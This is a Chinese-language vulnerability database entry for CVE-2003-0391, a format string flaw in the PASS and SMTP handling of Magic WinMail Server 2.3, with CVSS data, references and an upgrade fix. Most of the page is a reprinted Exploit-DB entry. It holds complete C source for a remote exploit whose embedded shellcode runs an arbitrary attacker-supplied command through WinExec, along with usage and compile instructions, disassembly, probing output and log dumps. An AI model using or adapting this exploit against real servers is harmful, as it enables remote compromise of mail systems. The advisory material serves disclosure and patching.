CVE-2003-0391
CVSS7.5
发布时间 :2003-07-02 00:00:00
修订时间 :2016-10-17 22:33:15
NMCOE    

[原文]Format string vulnerability in Magic WinMail Server 2.3, and possibly other 2.x versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string specifiers in the PASS command.


[CNNVD]Magic WinMail Server拒绝服务漏洞(CNNVD-200307-005)

        Magic WinMail Server 2.3可能还包括其他2.x版本存在格式化字符串漏洞。远程攻击者可以借助PASS命令中的格式化字符串说明符导致服务拒绝(崩溃),并且可能可以执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0391
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0391
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-005
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105370528428222&w=2
(UNKNOWN)  BUGTRAQ  20030523 Magic Winmail Server
http://www.magicwinmail.net/changelog.asp
(UNKNOWN)  MISC  http://www.magicwinmail.net/changelog.asp

- 漏洞信息

Magic WinMail Server拒绝服务漏洞
高危 格式化字符串
2003-07-02 00:00:00 2007-04-27 00:00:00
远程  
        Magic WinMail Server 2.3可能还包括其他2.x版本存在格式化字符串漏洞。远程攻击者可以借助PASS命令中的格式化字符串说明符导致服务拒绝(崩溃),并且可能可以执行任意代码。

- 公告与补丁

        

- 漏洞信息 (42)

Winmail Mail Server 2.3 Remote Format String Exploit (EDBID:42)
windows remote
2003-06-11 Verified
25 ThreaT
N/A [点击下载]
/******************************************************************
 * Magic Winmail Server 2.3(Build 0402) 
 * Remote Format string exploit.
 ******************************************************************
 * Coded by ThreaT.
 *
 *
 * This one take advantage of a format bug in the 
 * >>> SMTP protocol <<< (not pop3) for execute
 * a malicious command on a vulnerable system
 *
 * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
 * + The command to execute cannot exceed 90 characters +
 *
 * compile : cl.exe mwmxploit.c /w
 *
 ******************************************************************
*/


#include <windows.h>
#include <winsock.h>

#pragma comment (lib,"wsock32.lib")

void main (int argc, char *argv[])
{

	SOCKET sock;

	char buffer[1000];
	int i;

	// ecrasement d'un saved EIP grâce aux caractères de format
	char vuln[] = 		
		"\xec\xfc\x66\x01%x%x"
		"\xed\xfc\x66\x01%x%x"
		"\xee\xfc\x66\x01"
		
		"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
		"%97x%n%105x%hn"

/*

  This is my specific shellcode for execute a command
  over the Magic Winmail process.

  This one can contain null bytes, enjoy ! :)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00            Call dword ptr [004D01AC]

 Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00            Call dword ptr [004D0198]

 Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00            mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\

: EB50                    jmp 00401058
: 5E                      pop esi
: 8BEC                    mov ebp, esp
: 83EC28                  sub esp, 00000028		// je cree un stack
: C745D84B65726E          mov [ebp-28], 6E72654B
: C745DC656C3332          mov [ebp-24], 32336C65 // j'y place 'Kernel32'
: C745E000000000          mov [ebp-20], 00000000
: C745E457696E45          mov [ebp-1C], 456E6957
: C745E878656300          mov [ebp-18], 00636578 // ici 'WinExec'

// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin 
// de 4 caractères de plus pour la commande à executer
: C645EB00                mov [ebp-15], 00
										
: BAAC014D00              mov edx, 004D01AC
: 8D45D8                  lea eax, dword ptr [ebp-28]
: 50                      push eax
: FF12                    call dword ptr [edx]	// eax = GetModuleHandle ("Kernel32");
: 8D5DE4                  lea ebx, dword ptr [ebp-1C]
: 53                      push ebx
: 50                      push eax
: BAEC004D00              mov edx, 004D00EC
: FF12                    call dword ptr [edx]	// GetProcAdress (eax, "WinExec");
: 6A01                    push 00000001		// 1 = SW_SHOW, 0 = SW_HIDE 
: 56                      push esi
: FFD0                    call eax			// WinExec (argv[2], SW_SHOW)
: BA98014D00              mov edx, 004D0198
: FF12                    call dword ptr [edx]	// ExitProcess ();
: E8ABFFFFFF              call 00401008	

  \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////

  */
	

// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)

	"\x00\x90\x90\x90\x90"	// sa, c'est pour bien coller
	"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7" 
	"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4" 
	"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA" 
	"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA" 
	"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00" 
	"\xFF\x12\xE8\xAB\xFF\xFF\xFF";

	SOCKADDR_IN sin;
	WSADATA wsadata;
	WORD wVersionRequested = MAKEWORD (2,0);

	//
	printf ("* #################################### *\n"
		"  Magic Winmail Server 2.3(Build 0402)\n"
		"     Remote format string exploit !\n"
		"* #################################### *\n"
		"  Coded By ThreaT -> ThreaT\n\n");

	if (argc < 3 || strlen (argv[2]) > 90)
	{
	printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
			" + The command to execute cannot exceed 90 characters +\n");
	ExitProcess (0);
	}

	if ( WSAStartup(wVersionRequested, &wsadata) )
	{
		printf ("Erreur d'initialisation winsock !\n");
		ExitProcess (1);		
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
	
	if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
	{
		printf ("Erreur : L'adresse IP de la victime est incorrect !\n");
		ExitProcess (2);
	}

	printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );

	sock = socket (AF_INET, SOCK_STREAM, 0);
	if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
	{
		printf ("erreur : connexion impossible !\n");
		ExitProcess (3);
	}

	recv (sock,buffer,1000,0);
	
	printf ("ok\n-> %s\nsending exploit code...",buffer);

	send (sock, vuln, strlen (vuln) + 92, 0);  // envoi du shellcode
	send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande
	send (sock, "\r\n", 2, 0); // validation

	recv (sock,buffer,1000,0); // remote crash :)

	puts ("ok");
}

/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
 */

/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30   1548 Connect from 127.0.0.1
0906/Y-01:51:06   1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 
0x25783020 0x2078382e 0x2e257830

*/


// milw0rm.com [2003-06-11]
		

- 漏洞信息

4921
Winmail Server PASS Command Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-05-24 Unknow
Unknow 2003-05-30

- 解决方案

Upgrade to version 2.4 (Build 0530) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站